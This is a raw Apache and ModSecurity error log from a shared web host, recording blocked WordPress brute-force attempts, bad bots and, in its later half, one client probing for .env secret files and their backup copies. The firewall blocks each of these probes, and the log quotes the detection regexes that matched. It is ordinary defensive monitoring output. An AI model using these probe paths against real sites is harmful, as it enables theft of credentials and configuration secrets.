[Tue May 26 14:26:19.668286 2026] [core:crit] [pid 610693:tid 610851] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:19.954413 2026] [core:crit] [pid 610693:tid 610891] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:20.072992 2026] [security2:error] [pid 606909:tid 607008] [remote 54.38.29.86:57722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVgM10yRtX9qA7aVUVnvgAAkWI"]
[Tue May 26 14:26:20.269078 2026] [core:crit] [pid 606909:tid 607115] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:20.418803 2026] [security2:error] [pid 606909:tid 607142] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgM10yRtX9qA7aVUVnwAAAAOw"]
[Tue May 26 14:26:21.358423 2026] [security2:error] [pid 606909:tid 607068] [client 94.103.90.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVgNV0yRtX9qA7aVUVn0AAAAKI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 14:26:21.987128 2026] [security2:error] [pid 610693:tid 610896] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgNTvNO3hpmlY6M8RfpAAAAEk"]
[Tue May 26 14:26:22.146023 2026] [security2:error] [pid 610693:tid 610877] [client 49.13.164.148:6392] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVgNTvNO3hpmlY6M8RfpQAAADY"], referer: http://ucdc.co.in/
[Tue May 26 14:26:22.190760 2026] [security2:error] [pid 610693:tid 610892] [client 94.103.90.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVgNjvNO3hpmlY6M8RfrAAAAEU"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 14:26:22.478911 2026] [core:crit] [pid 610693:tid 610940] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:24.165476 2026] [security2:error] [pid 610693:tid 610859] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgNzvNO3hpmlY6M8RfxQAAACQ"]
[Tue May 26 14:26:24.357142 2026] [autoindex:error] [pid 610693:tid 610918] [client 15.204.161.7:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:24.995449 2026] [core:crit] [pid 610693:tid 610825] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:26.164977 2026] [security2:error] [pid 610693:tid 610931] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgOTvNO3hpmlY6M8Rf2QAAAGw"]
[Tue May 26 14:26:27.306595 2026] [security2:error] [pid 606909:tid 606936] [remote 103.230.156.120:54172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVgO10yRtX9qA7aVUVoAQAA2Bo"]
[Tue May 26 14:26:27.733671 2026] [security2:error] [pid 606909:tid 606941] [remote 95.216.117.13:34664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVgO10yRtX9qA7aVUVoCAAAzB8"]
[Tue May 26 14:26:28.445614 2026] [security2:error] [pid 606909:tid 607160] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgO10yRtX9qA7aVUVoEQAAAP4"]
[Tue May 26 14:26:28.462293 2026] [security2:error] [pid 606909:tid 607113] [client 157.55.39.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVgOl0yRtX9qA7aVUVn8wAAAM8"]
[Tue May 26 14:26:28.566959 2026] [security2:error] [pid 610693:tid 610944] [client 114.119.157.37:56907] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVgPDvNO3hpmlY6M8Rf9gAAAHk"], referer: http://haddingtonwines.com/cart?remove_item=fd272fe04b7d4e68effd01bddcc6bb34
[Tue May 26 14:26:28.662451 2026] [core:crit] [pid 610693:tid 610900] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:29.389426 2026] [security2:error] [pid 610693:tid 610947] [client 202.141.83.254:53973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgPTvNO3hpmlY6M8Rf_wAAAHw"]
[Tue May 26 14:26:29.389528 2026] [security2:error] [pid 610693:tid 610947] [client 202.141.83.254:53973] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgPTvNO3hpmlY6M8Rf_wAAAHw"]
[Tue May 26 14:26:30.342873 2026] [security2:error] [pid 610693:tid 610949] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgPTvNO3hpmlY6M8RgCQAAAH4"]
[Tue May 26 14:26:32.268384 2026] [security2:error] [pid 610693:tid 610944] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgPzvNO3hpmlY6M8RgLAAAAHk"]
[Tue May 26 14:26:32.723299 2026] [core:crit] [pid 610693:tid 610941] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:33.675773 2026] [core:crit] [pid 610693:tid 610939] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:33.862184 2026] [security2:error] [pid 610693:tid 610852] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgQTvNO3hpmlY6M8RgSAAAAB0"]
[Tue May 26 14:26:34.147197 2026] [core:crit] [pid 606909:tid 607112] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:35.165174 2026] [autoindex:error] [pid 606909:tid 607120] [client 208.84.101.154:3794] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:35.952948 2026] [autoindex:error] [pid 606909:tid 607058] [client 208.84.101.154:11254] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:36.930413 2026] [security2:error] [pid 610693:tid 610846] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgRDvNO3hpmlY6M8RgcwAAABc"]
[Tue May 26 14:26:37.657988 2026] [security2:error] [pid 610693:tid 610766] [remote 95.216.117.13:33442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVgRTvNO3hpmlY6M8RgjQAAGEg"]
[Tue May 26 14:26:38.500644 2026] [security2:error] [pid 610693:tid 610861] [client 202.76.138.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgRjvNO3hpmlY6M8RglgAAACY"]
[Tue May 26 14:26:38.678494 2026] [security2:error] [pid 610693:tid 610935] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgRjvNO3hpmlY6M8RgngAAAHA"]
[Tue May 26 14:26:38.988837 2026] [core:crit] [pid 610693:tid 610910] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:39.645775 2026] [security2:error] [pid 606909:tid 607119] [client 208.84.101.154:3794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVgR10yRtX9qA7aVUVofAAAANU"]
[Tue May 26 14:26:39.968428 2026] [security2:error] [pid 606909:tid 606981] [remote 74.7.241.58:59374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVgR10yRtX9qA7aVUVogQABAUc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:26:39.988841 2026] [security2:error] [pid 610693:tid 610836] [client 202.141.83.254:5773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgRzvNO3hpmlY6M8RgzQAAAA0"]
[Tue May 26 14:26:39.988966 2026] [security2:error] [pid 610693:tid 610836] [client 202.141.83.254:5773] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgRzvNO3hpmlY6M8RgzQAAAA0"]
[Tue May 26 14:26:40.442703 2026] [security2:error] [pid 610693:tid 610853] [client 208.84.101.154:3838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/backend/.env"] [unique_id "ahVgSDvNO3hpmlY6M8Rg5AAAAB4"]
[Tue May 26 14:26:40.444106 2026] [security2:error] [pid 610693:tid 610931] [client 208.84.101.154:3834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/api/.env"] [unique_id "ahVgSDvNO3hpmlY6M8Rg5wAAAGw"]
[Tue May 26 14:26:40.445862 2026] [security2:error] [pid 606909:tid 607093] [client 208.84.101.154:3828] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/app/.env"] [unique_id "ahVgSF0yRtX9qA7aVUVojgAAALs"]
[Tue May 26 14:26:40.790228 2026] [security2:error] [pid 610693:tid 610902] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgSDvNO3hpmlY6M8Rg4AAAAE8"]
[Tue May 26 14:26:42.561125 2026] [autoindex:error] [pid 606909:tid 607048] [client 208.84.101.154:3958] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:42.822090 2026] [security2:error] [pid 606909:tid 607077] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgSl0yRtX9qA7aVUVoogAAAKs"]
[Tue May 26 14:26:44.361694 2026] [security2:error] [pid 610693:tid 610940] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgSzvNO3hpmlY6M8RhHQAAAHU"]
[Tue May 26 14:26:44.453493 2026] [security2:error] [pid 606909:tid 607047] [client 208.84.101.154:3958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.copy"] [unique_id "ahVgTF0yRtX9qA7aVUVoxQAAAI0"]
[Tue May 26 14:26:44.749963 2026] [core:crit] [pid 610693:tid 610885] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:46.477963 2026] [security2:error] [pid 606909:tid 607074] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgTl0yRtX9qA7aVUVo8QAAAKg"]
[Tue May 26 14:26:46.859373 2026] [security2:error] [pid 610693:tid 610910] [client 208.84.101.154:3806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.copy"] [unique_id "ahVgTjvNO3hpmlY6M8RhQwAAAFc"]
[Tue May 26 14:26:46.859854 2026] [security2:error] [pid 610693:tid 610949] [client 208.84.101.154:50150] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.old"] [unique_id "ahVgTjvNO3hpmlY6M8RhRgAAAH4"]
[Tue May 26 14:26:46.860303 2026] [security2:error] [pid 610693:tid 610867] [client 208.84.101.154:50234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.bak"] [unique_id "ahVgTjvNO3hpmlY6M8RhRQAAACw"]
[Tue May 26 14:26:46.861103 2026] [security2:error] [pid 610693:tid 610903] [client 208.84.101.154:3920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.orig"] [unique_id "ahVgTjvNO3hpmlY6M8RhRAAAAFA"]
[Tue May 26 14:26:46.863364 2026] [security2:error] [pid 610693:tid 610909] [client 208.84.101.154:50210] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.swp"] [unique_id "ahVgTjvNO3hpmlY6M8RhRwAAAFY"]
[Tue May 26 14:26:46.866518 2026] [security2:error] [pid 610693:tid 610891] [client 208.84.101.154:50224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.orig"] [unique_id "ahVgTjvNO3hpmlY6M8RhSAAAAEQ"]
[Tue May 26 14:26:46.944843 2026] [security2:error] [pid 606909:tid 607067] [client 208.84.101.154:50200] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production~"] [unique_id "ahVgTl0yRtX9qA7aVUVpBQAAAKE"]
[Tue May 26 14:26:46.948105 2026] [security2:error] [pid 610693:tid 610878] [client 208.84.101.154:50096] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.orig"] [unique_id "ahVgTjvNO3hpmlY6M8RhUwAAADc"]
[Tue May 26 14:26:46.948109 2026] [security2:error] [pid 610693:tid 610848] [client 208.84.101.154:50132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.backup"] [unique_id "ahVgTjvNO3hpmlY6M8RhUQAAABk"]
[Tue May 26 14:26:46.948401 2026] [security2:error] [pid 610693:tid 610853] [client 208.84.101.154:50110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.copy"] [unique_id "ahVgTjvNO3hpmlY6M8RhUgAAAB4"]
[Tue May 26 14:26:46.948863 2026] [security2:error] [pid 610693:tid 610880] [client 208.84.101.154:50082] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.swp"] [unique_id "ahVgTjvNO3hpmlY6M8RhVQAAADk"]
